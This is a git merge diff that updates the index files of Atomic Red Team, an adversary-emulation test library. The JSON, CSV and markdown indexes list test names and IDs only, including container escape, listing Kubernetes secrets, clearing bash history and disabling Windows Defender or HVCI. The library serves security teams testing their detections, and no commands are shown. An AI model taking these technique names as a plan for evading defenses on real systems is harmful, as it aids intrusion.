Merge branch 'master' into master

2023-04-13 13:41:13 -07:00
parent 257a326599 779d458d9e
commit 047de97fae
41 changed files with 1168 additions and 215 deletions
@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
+discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
 credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
 credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
@@ -305,6 +305,11 @@ defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User usin
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
@@ -366,6 +371,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Suspend Hi
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
@@ -1411,14 +1417,15 @@ discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers
 discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
 discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
-discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
-discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
-discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
-discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
-discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
-discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
-discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
-discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
+discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
+discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
+discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
+discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
+discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
+discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
 discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
@@ -69,6 +69,11 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configu
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -243,8 +248,8 @@ discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db26
 discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
-discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
-discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
+discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
@@ -197,8 +197,8 @@ discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7f
 discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
-discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
-discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
+discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
 discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
@@ -261,6 +261,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Bl
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
@@ -979,12 +980,12 @@ discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers
 discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
 discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
-discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
-discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
-discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
-discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
-discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
-discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
+discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
+discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
+discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
+discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
 discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
@@ -3,7 +3,8 @@
 - [T1613 Container and Resource Discovery](../../T1613/T1613.md)
  - Atomic Test #1: Container and ResourceDiscovery [containers]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1046 Network Service Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1046 Network Service Discovery](../../T1046/T1046.md)
+  - Atomic Test #9: Network Service Discovery for Containers [containers]

 # credential-access
 - T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -73,7 +73,7 @@
 - T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1526 Cloud Service Discovery](../../T1526/T1526.md)
  - Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
- T1046 Network Service Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1046 Network Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

@@ -430,6 +430,11 @@
 - [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
  - Atomic Test #1: Disable history collection [linux, macos]
  - Atomic Test #2: Mac HISTCONTROL [macos, linux]
+  - Atomic Test #3: Clear bash history [linux]
+  - Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
+  - Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
+  - Atomic Test #6: Setting the HISTFILE environment variable [linux]
+  - Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
  - Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
@@ -504,6 +509,7 @@
  - Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
  - Atomic Test #42: Clear Pagging Cache [linux]
  - Atomic Test #43: Disable Memory Swap [linux]
+  - Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2165,7 +2171,7 @@
  - Atomic Test #18: Get-DomainController with PowerView [windows]
  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
  - Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
+- [T1046 Network Service Discovery](../../T1046/T1046.md)
  - Atomic Test #1: Port Scan [linux, macos]
  - Atomic Test #2: Port Scan Nmap [linux, macos]
  - Atomic Test #3: Port Scan NMap for Windows [windows]
@@ -2174,6 +2180,7 @@
  - Atomic Test #6: WinPwn - MS17-10 [windows]
  - Atomic Test #7: WinPwn - bluekeep [windows]
  - Atomic Test #8: WinPwn - fruit [windows]
+  - Atomic Test #9: Network Service Discovery for Containers [containers]
 - [T1518 Software Discovery](../../T1518/T1518.md)
  - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
  - Atomic Test #2: Applications Installed [windows]
@@ -117,6 +117,11 @@
 - [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
  - Atomic Test #1: Disable history collection [linux, macos]
  - Atomic Test #2: Mac HISTCONTROL [macos, linux]
+  - Atomic Test #3: Clear bash history [linux]
+  - Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
+  - Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
+  - Atomic Test #6: Setting the HISTFILE environment variable [linux]
+  - Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
@@ -525,7 +530,7 @@
  - Atomic Test #12: Remote System Discovery - ip neighbour [linux]
  - Atomic Test #13: Remote System Discovery - ip route [linux]
  - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
+- [T1046 Network Service Discovery](../../T1046/T1046.md)
  - Atomic Test #1: Port Scan [linux, macos]
  - Atomic Test #2: Port Scan Nmap [linux, macos]
 - T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -517,7 +517,7 @@
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
  - Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
  - Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
+- [T1046 Network Service Discovery](../../T1046/T1046.md)
  - Atomic Test #1: Port Scan [linux, macos]
  - Atomic Test #2: Port Scan Nmap [linux, macos]
 - [T1518 Software Discovery](../../T1518/T1518.md)
@@ -370,6 +370,7 @@
  - Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
  - Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
  - Atomic Test #38: Delete Windows Defender Scheduled Tasks [windows]
+  - Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1544,7 +1545,7 @@
  - Atomic Test #18: Get-DomainController with PowerView [windows]
  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
  - Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
+- [T1046 Network Service Discovery](../../T1046/T1046.md)
  - Atomic Test #3: Port Scan NMap for Windows [windows]
  - Atomic Test #4: Port Scan using python [windows]
  - Atomic Test #5: WinPwn - spoolvulnscan [windows]
@@ -29,7 +29,7 @@
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) |  |  |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
